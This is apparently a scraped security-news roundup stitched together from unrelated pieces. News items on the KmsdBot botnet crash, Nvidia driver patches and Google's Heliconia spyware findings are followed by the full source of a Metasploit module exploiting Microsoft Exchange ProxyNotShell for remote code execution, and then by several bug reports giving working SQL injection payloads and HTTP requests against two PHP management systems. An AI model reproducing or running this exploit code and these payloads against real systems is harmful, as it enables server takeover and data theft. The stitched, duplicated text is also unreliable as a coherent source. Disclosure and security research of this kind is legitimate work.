An ongoing analysis into an up-and-coming cryptocurrency mining botnet known as KmsdBot has led to it being accidentally taken down.
KmsdBot, as christened by the Akamai Security Intelligence Response Team (SIRT), came to light mid-November 2022 for its ability to brute-force systems with weak SSH credentials.
The botnet strikes both Windows and Linux devices spanning a wide range of

An ongoing analysis into an up-and-coming cryptocurrency mining botnet known as **KmsdBot** has led to it being accidentally taken down.

KmsdBot, as christened by the Akamai Security Intelligence Response Team (SIRT), came to light mid-November 2022 for its ability to brute-force systems with weak SSH credentials.

The botnet strikes both Windows and Linux devices spanning a wide range of microarchitectures with the primary goal of deploying mining software and corralling the compromised hosts into a DDoS bot.

Some of the major targets included gaming firms, technology companies, and luxury car manufacturers.

Akamai researcher Larry W. Cashdollar, in a new update, explained how commands sent to the bot to understand its functionality in a controlled environment inadvertently neutralized the malware.

"Interestingly, after one single improperly formatted command, the bot stopped sending commands," Cashdollar said. "It's not every day you come across a botnet that the threat actors themselves crash their own handiwork."

This, in turn, was made possible due to the lack of an error-checking mechanism built into the source code to validate the received commands.

Specifically, an instruction issued without a space between the target website and the port caused the entire Go binary running on the infected machine to crash and stop interacting with its command-and-control server, effectively killing the botnet.

The fact that KmsdBot doesn't have a persistence mechanism also means that the malware operator will have to re-infect the machines again and re-build the infrastructure from scratch.

"This botnet has been going after some very large luxury brands and gaming companies, and yet, with one failed command it cannot continue," Cashdollar concluded. "This is a strong example of the fickle nature of technology and how even the exploiter can be exploited by it."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers 'Accidentally’ Crash KmsdBot Cryptocurrency Mining Botnet Network

If unpatched, a host of GPU Display Driver flaws could expose gamers, graphic designers, and others to code execution, denial of service, data tampering, and more.

A new update from Nvidia for its GPU Display Driver includes fixes for a full 29 security vulnerabilities, seven with a base score of more than 7. 

The company's graphics cards are built to accelerate computing processing to support real-time or data-intensive applications. As such, they're known for their use by gamers, graphic designers, and other creative producers, and for artificial intelligence and machine learning. Impacted software products for the update specifically include GeForce, Studio, Nvidia RTX, Quadro, NVS, and Tesla.

The most serious of the bugs are two flaws that exist in the user mode layer for Windows versions, both of which could allow an unauthorized user to execute code, escalate privileges, launch denial-of-service attacks, and achieve data compromise and disclosure, according to the chipmaker:

*   **CVE‑2022‑34669** (CVSS score of 8.8): An unprivileged regular user can access or modify system files or other files that are critical to the application.
*   **CVE‑2022‑34671** (CVSS score of 8.7): An unprivileged regular user can cause an out-of-bounds write.

The display driver for Linux also received a number of updates in this latest security update. 

"Earlier software branch releases that support these products may also be affected," the Nvidia security update said. "If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release." 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Nvidia GPU Driver Bugs Threaten Device Takeover & More

This Metasploit module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only supports Exchange Server 2019. These vulnerabilities were patched in November 2022.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HTTP::Exchange  include Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell  include Msf::Exploit::EXE  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Exchange ProxyNotShell RCE',        'Description' => %q{          This module chains two vulnerabilities on Microsoft Exchange Server          that, when combined, allow an authenticated attacker to interact with          the Exchange Powershell backend (CVE-2022-41040), where a          deserialization flaw can be leveraged to obtain code execution          (CVE-2022-41082). This exploit only support Exchange Server 2019.          These vulnerabilities were patched in November 2022.        },        'Author' => [          'Orange Tsai', # Discovery of ProxyShell SSRF          'Spencer McIntyre', # Metasploit module          'DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q', # Vulnerability analysis          'Piotr Bazydło', # Vulnerability analysis          'Rich Warren', # EEMS bypass via ProxyNotRelay          'Soroush Dalili' # EEMS bypass        ],        'References' => [          [ 'CVE', '2022-41040' ], # ssrf          [ 'CVE', '2022-41082' ], # rce          [ 'URL', 'https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend' ],          [ 'URL', 'https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/' ],          [ 'URL', 'https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9' ],          [ 'URL', 'https://rw.md/2022/11/09/ProxyNotRelay.html' ]        ],        'DisclosureDate' => '2022-09-28', # announcement of limited details, patched 2022-11-08        'License' => MSF_LICENSE,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true        },        'Platform' => ['windows'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => true,        'Targets' => [          [            'Windows Dropper',            {              'Platform' => 'windows',              'Arch' => [ARCH_X64, ARCH_X86],              'Type' => :windows_dropper            }          ],          [            'Windows Command',            {              'Platform' => 'windows',              'Arch' => [ARCH_CMD],              'Type' => :windows_command            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'AKA' => ['ProxyNotShell'],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options([      OptString.new('USERNAME', [ true, 'A specific username to authenticate as' ]),      OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),      OptString.new('DOMAIN', [ false, 'The domain to authenticate to' ])    ])    register_advanced_options([      OptEnum.new('EemsBypass', [ true, 'Technique to bypass the EEMS rule', 'IBM037v1', %w[IBM037v1 none]])    ])  end  def check    @ssrf_email ||= Faker::Internet.email    res = send_http('GET', '/mapi/nspi/')    return CheckCode::Unknown if res.nil?    return CheckCode::Unknown('Server responded with 401 Unauthorized.') if res.code == 401    return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'    # actually run the powershell cmdlet and see if it works, this will fail if:    #   * the credentials are incorrect (USERNAME, PASSWORD, DOMAIN)    #   * the exchange emergency mitigation service M1 rule is in place    return CheckCode::Safe unless execute_powershell('Get-Mailbox')    CheckCode::Vulnerable  rescue Msf::Exploit::Failed => e    CheckCode::Safe(e.to_s)  end  def ibm037(string)    string.encode('IBM037').force_encoding('ASCII-8BIT')  end  def send_http(method, uri, opts = {})    opts[:authentication] = {      'username' => datastore['USERNAME'],      'password' => datastore['PASSWORD'],      'preferred_auth' => 'NTLM'    }    if uri =~ /powershell/i && datastore['EemsBypass'] == 'IBM037v1'      uri = "/Autodiscover/autodiscover.json?#{ibm037(@ssrf_email + uri + '?')}&#{ibm037('Email')}=#{ibm037('Autodiscover/autodiscover.json?' + @ssrf_email)}"      opts[:headers] = {        'X-Up-Devcap-Post-Charset' => 'IBM037',        # technique needs the "UP" prefix, see: https://github.com/Microsoft/referencesource/blob/3b1eaf5203992df69de44c783a3eda37d3d4cd10/System/net/System/Net/HttpListenerRequest.cs#L362        'User-Agent' => "UP #{datastore['UserAgent']}"      }    else      uri = "/Autodiscover/autodiscover.json?#{@ssrf_email + uri}?&Email=Autodiscover/autodiscover.json?#{@ssrf_email}"    end    super(method, uri, opts)  end  def exploit    # if we're doing pre-exploit checks, make sure the target is Exchange Server 2019 because the XamlGadget does not    # work on Exchange Server 2016    if datastore['AutoCheck'] && !datastore['ForceExploit'] && (version = exchange_get_version)      vprint_status("Detected Exchange version: #{version}")      if version < Rex::Version.new('15.2')        fail_with(Failure::NoTarget, 'This exploit is only compatible with Exchange Server 2019 (version 15.2)')      end    end    @ssrf_email ||= Faker::Internet.email    case target['Type']    when :windows_command      vprint_status("Generated payload: #{payload.encoded}")      execute_command(payload.encoded)    when :windows_dropper      execute_cmdstager({ linemax: 7_500 })    end  end  def execute_command(cmd, _opts = {})    xaml = Nokogiri::XML(<<-XAML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root      <ResourceDictionary        xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"        xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"        xmlns:System="clr-namespace:System;assembly=mscorlib"        xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">        <ObjectDataProvider x:Key="LaunchCalch" ObjectType="{x:Type Diag:Process}" MethodName="Start">          <ObjectDataProvider.MethodParameters>            <System:String>cmd.exe</System:String>            <System:String>/c #{cmd.encode(xml: :text)}</System:String>          </ObjectDataProvider.MethodParameters>        </ObjectDataProvider>      </ResourceDictionary>    XAML    identity = Nokogiri::XML(<<-IDENTITY, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root      <Obj N="V" RefId="14">        <TN RefId="1">        <T>System.ServiceProcess.ServiceController</T>          <T>System.Object</T>        </TN>        <ToString>Object</ToString>        <Props>          <S N="Name">Type</S>          <Obj N="TargetTypeForDeserialization">            <TN RefId="1">              <T>System.Exception</T>              <T>System.Object</T>            </TN>            <MS>              <BA N="SerializationData">                #{Rex::Text.encode_base64(XamlLoaderGadget.generate.to_binary_s)}              </BA>            </MS>          </Obj>        </Props>        <S>          <![CDATA[#{xaml}]]>        </S>      </Obj>    IDENTITY    execute_powershell('Get-Mailbox', args: [      { name: '-Identity', value: identity }    ])  endendclass XamlLoaderGadget < Msf::Util::DotNetDeserialization::Types::SerializedStream  include Msf::Util::DotNetDeserialization  def self.generate    from_values([      Types::RecordValues::SerializationHeaderRecord.new(root_id: 1, header_id: -1),      Types::RecordValues::SystemClassWithMembersAndTypes.from_member_values(        class_info: Types::General::ClassInfo.new(          obj_id: 1,          name: 'System.UnitySerializationHolder',          member_names: %w[Data UnityType AssemblyName]        ),        member_type_info: Types::General::MemberTypeInfo.new(          binary_type_enums: %i[String Primitive String],          additional_infos: [ 8 ]        ),        member_values: [          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(            obj_id: 2,            string: 'System.Windows.Markup.XamlReader'          )),          4,          Types::Record.from_value(Types::RecordValues::BinaryObjectString.new(            obj_id: 3,            string: 'PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35'          ))        ]      ),      Types::RecordValues::MessageEnd.new    ])  endend

Microsoft Exchange ProxyNotShell Remote Code Execution

The Heliconia hacking tool exploited vulnerabilities in Chrome, Windows Defender, and Firefox, according to company security researchers.

The commercial spyware industry has increasingly come under fire for selling powerful surveillance tools to anyone who can pay, from governments to criminals around the world. Across the European Union, details of how spyware has been used to target activists, opposition leaders, lawyers, and journalists in multiple countries have recently touched off scandals and calls for reform. Today, Google's Threat Analysis Group announced action to block one such hacking tool that targeted desktop computers and was seemingly developed by a Spanish firm.

The exploitation framework, dubbed Heliconia, came to Google's attention after a series of anonymous submissions to the Chrome bug reporting program. The disclosures pointed to exploitable vulnerabilities in Chrome, Windows Defender, and Firefox that could be abused to deploy spyware on target devices, including Windows and Linux computers. The submission included source code from the Heliconia hacking framework and called the vulnerabilities Heliconia Noise, Heliconia Soft, and Files. Google says the evidence points to the Barcelona-based tech firm Variston IT as the developer of the hacking framework.

“The findings indicate that we have many small players within the spyware industry, but with strong capabilities related to zero days,” TAG researchers told WIRED, referring to unknown, unpatched vulnerabilities. 

Variston IT did not respond to a request for comment from WIRED. The company's director, Ralf Wegner, told TechCrunch that Variston was not given the opportunity to review Google’s research and could not validate it. He added that he “would be surprised if such item was found in the wild.” Google confirmed that the researchers did not contact Variston IT in advance of publication, as is the company's standard practice in these types of investigations. 

Google, Microsoft, and Mozilla patched the Heliconia vulnerabilities in 2021 and 2022, and Google says it has not detected any current exploitation of the bugs. But evidence in the bug submissions indicates that the framework was likely being used to exploit the flaws starting in 2018 and 2019, long before they were patched. Heliconia Noise exploited a Chrome renderer vulnerability and a sandbox escape, while Heliconia Soft used a malicious PDF laced with a Windows Defender exploit, and Files deployed a group of Firefox exploits for Windows and Linux. TAG collaborated on the research with members of Google's Project Zero bug-hunting group and the Chrome V8 security team.

The fact that Google does not see current evidence of exploitation may mean that the Heliconia framework is now dormant, but it might also indicate that the hacking tool has evolved. “It could be there are other exploits, a new framework, their exploits didn’t cross our systems, or there are other layers now to protect their exploits,” TAG researchers told WIRED.

Ultimately, the group says its goal with this type of research is to shed light on the commercial spyware industry's methods, technical capabilities, and abuses. TAG created detections for Google's Safe Browsing service to warn about Heliconia-related sites and files, and the researchers emphasize that it's always important to keep software up to date.

“The growth of the spyware industry puts users at risk and makes the internet less safe,” TAG wrote in a blog post about the findings. “And while surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups.”

Google Moves to Block Invasive Spanish Spyware Framework

The framework has ties back to a Spanish exploit broker called Variston IT, and offers a one-stop shop for compromising Chrome, Defender and Firefox.

Google's Threat Analysis Group (TAG) has discovered a cyberattack framework dubbed Heliconia, built to exploit zero-day and n-day vulnerabilities in Chrome, Firefox, and Microsoft Defender. It likely has connections to a gray-market spyware broker called Variston IT, which highlights how this shadowy segment is flourishing.

The Heliconia threat consists of three modules:

*   Heliconia Noise for compromising the Chrome browser, escaping the sandbox, and installing malware;
*   Heliconia Soft, a Web framework that deploys a PDF containing a Windows Defender exploit for CVE-2021-42298 that allows privilege escalation to SYSTEM and remote code execution (RCE);
*   And the Heliconia Files package which contains a fully documented Firefox exploit chain for Windows and Linux, including CVE-2022-26485 for RCE.

TAG became aware of the threat after receiving an anonymous submission to the Chrome bug reporting program. Upon further investigation, the Heliconia framework's source code was found to contain a script that points back to Variston IT, a Barcelona-headquartered entity that claims to provide "custom security solutions."

Commercial spyware is often sold by organizations claiming to be legitimate companies, for "use by law enforcement." However, mounting evidence shows that too often, these brokers don't vet their clients, "putting advanced surveillance capabilities in the hands of governments who use them to spy on journalists, human rights activists, political opposition and dissidents," according to a TAG posting on Wednesday.

Researchers noted that Variston IT is firmly in the middle of this proliferating market — a space that has seen sanctioning by the United States and others against organizations like the infamous NSO Group, creator of the Pegasus spyware.

"The commercial surveillance industry is thriving and has expanded significantly in recent years, creating risk for Internet users around the globe," TAG researchers added. "While surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups."

So far, none of the modules has been seen in current attacks in the wild, but TAG researchers noted that they've likely been deployed in the past, including using the exploits they contain as zero-days before they were fixed.

Google TAG Warns on Emerging Heliconia Exploit Framework for RCE

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=services/manage_service&id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/?page=services/manage\_service&id=

Vulnerability location: /php-sms/admin/?page=services/manage\_service&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=services/manage\_service&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=services/manage\_service&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44294: bug_report/SQLi-3.md at main · Distance10086/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/quotes/manage_remark.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/quotes/manage\_remark.php?id=

Vulnerability location: /php-sms/admin/quotes/manage\_remark.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/quotes/manage\_remark.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/quotes/manage\_remark.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44296: bug_report/SQLi-2.md at main · Distance10086/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/orders/assign_team.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/orders/assign\_team.php?id=

Vulnerability location: /php-sms/admin/orders/assign\_team.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/orders/assign\_team.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/orders/assign\_team.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44295: bug_report/SQLi-1.md at main · Distance10086/bug_report

Simple Inventory Management System v1.0 is vulnerable to SQL Injection via /ims/login.php.

**Simple Inventory Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: li-baige

vendors:https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html

Vulnerability File: /ims/login.php

Parameter "email" (POST), exists SQL injection vulnerability

Payload1: email=a'&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 21
    
    email=a'&pwd=b&login=
    

In response to an error

Payload2: email=a''&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 22
    
    email=a''&pwd=b&login=
    

In response to the right

Payload3: email=a'%2b(select\*from(select(sleep(20)))a)%2b'&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 61
    
    email=a'%2b(select*from(select(sleep(20)))a)%2b'&pwd=b&login=
    

Response time is 20 seconds

Tag

#windows